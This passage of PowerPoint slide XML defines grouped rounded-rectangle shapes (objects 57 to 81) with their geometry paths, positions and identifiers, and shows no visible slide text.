              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1056640" h="772794">
                  <a:moveTo>
                    <a:pt x="927354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9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9" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78652" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128778" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927354" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977479" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018413" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046011" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046011" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018413" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977479" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927354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7" name="object 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A271E068-C933-3B75-8CDF-418DF8FE3ACD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6974586" y="2157222"/>
              <a:ext cx="1056640" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1056640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9" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78652" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128778" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927354" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977479" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018413" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046011" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046011" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018413" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977479" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927354" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128778" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78652" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37719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4" name="object 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2EFEEB2-B52D-7D8B-9557-CB268E10422C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7137978" y="2331519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5" name="object 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{498910CC-D6AF-BEC2-50E7-D9ADC8C47B49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5554034" y="2925879"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="5532882" y="2995422"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="object 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73092697-6091-61ED-0409-612B5D55B1C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5532882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7" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388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5" name="object 61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EB20D43-D081-1654-4DA0-4A93D1472D51}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5532882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5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8" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107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6" name="object 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B61713E-55CC-C9E2-8F9D-52AB6A28A274}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5692717" y="3169973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7" name="object 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96C4A463-A2AD-0DF1-CB23-2C651FBB1422}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6297746" y="2925879"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="6276594" y="2995422"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="object 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{960114CD-E4C3-E119-D58E-BCED691BDF2F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6276594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4" h="772795">
                  <a:moveTo>
                    <a:pt x="735329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735329" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785455" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785455" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735329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3" name="object 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CE14E39-8544-7E42-0104-B2D277E75856}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6276594" y="2995422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4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29" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785455" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785455" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735329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8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8" name="object 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A78B02F3-7EB5-2C8A-23DB-8E8A5974280F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6437318" y="3170608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9" name="object 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9782302-6C5D-7A26-10D5-F9F1F185C8C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4761553" y="3828086"/>
            <a:ext cx="864235" cy="774700"/>
            <a:chOff x="4740401" y="3897629"/>
            <a:chExt cx="864235" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="object 68">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{930A9F27-7711-1101-0B54-1A9B96C12130}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4740401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735076" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="129032" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10140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1" name="object 69">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7590CD27-4D0A-BECB-A474-36630E73BDBA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4740401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0" y="129032"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1290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40" name="object 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAE2B550-E1A7-BFCD-7E4E-23F62623653C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4900492" y="4073704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1" name="object 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63E130AB-FF42-8FD6-85C1-53818E87E462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6994213" y="2925879"/>
            <a:ext cx="1056640" cy="772795"/>
            <a:chOff x="6973061" y="2995422"/>
            <a:chExt cx="1056640" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="object 72">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFDBC81B-4A30-E336-00D2-DF8133E09070}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6973061" y="2995422"/>
              <a:ext cx="1056640" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1056640" h="772795">
                  <a:moveTo>
                    <a:pt x="927354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9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9" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78652" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128778" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927354" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977479" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018413" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046011" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046011" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018413" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977479" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927354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9" name="object 73">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{295E766E-ACD0-1665-2DDA-2113FD1BB502}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6973061" y="2995422"/>
              <a:ext cx="1056640" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1056640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9" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78652" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128778" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927354" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977479" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018413" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046011" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046011" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018413" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977479" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927354" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128778" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78652" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37719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42" name="object 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88650ECB-DEC1-5000-CE1C-5A8F93435F69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7136454" y="3170608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3" name="object 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{980B37FA-EE81-D40E-A4BA-8D9ED29FFED6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5554034" y="3828086"/>
            <a:ext cx="864235" cy="774700"/>
            <a:chOff x="5532882" y="3897629"/>
            <a:chExt cx="864235" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="object 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50D99C29-B739-DC48-9B98-889A10E72ABD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5532882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735076" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="129031" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129031" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="2867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7" name="object 77">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2264288-1F9B-F246-18F1-DBCF1E7908D6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5532882" y="3897629"/>
              <a:ext cx="864235" cy="774700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="864235" h="774700">
                  <a:moveTo>
                    <a:pt x="0" y="129032"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129031" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129031" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1290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44" name="object 78">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED4AAB9B-6239-EBC3-F0A8-93894BC87DFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5692717" y="4073704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5" name="object 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEE2D9AB-6CF1-5B43-8BEC-B5CBEE6A8012}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6306890" y="3828086"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="6285738" y="3897629"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="object 80">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A854310-43F1-512D-9023-E00E03EDCAF4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6285738" y="3897629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4" h="772795">
                  <a:moveTo>
                    <a:pt x="735330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9" y="37719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10120" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="128778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="643890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10120" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37719" y="734949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78652" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128777" y="772668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735330" y="772668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785455" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388" y="734949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="643890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388" y="37719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785455" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735330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5" name="object 81">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{024F7DD8-5BDA-CC80-E7F4-6570BCDF969F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6285738" y="3897629"/>
              <a:ext cx="864235" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
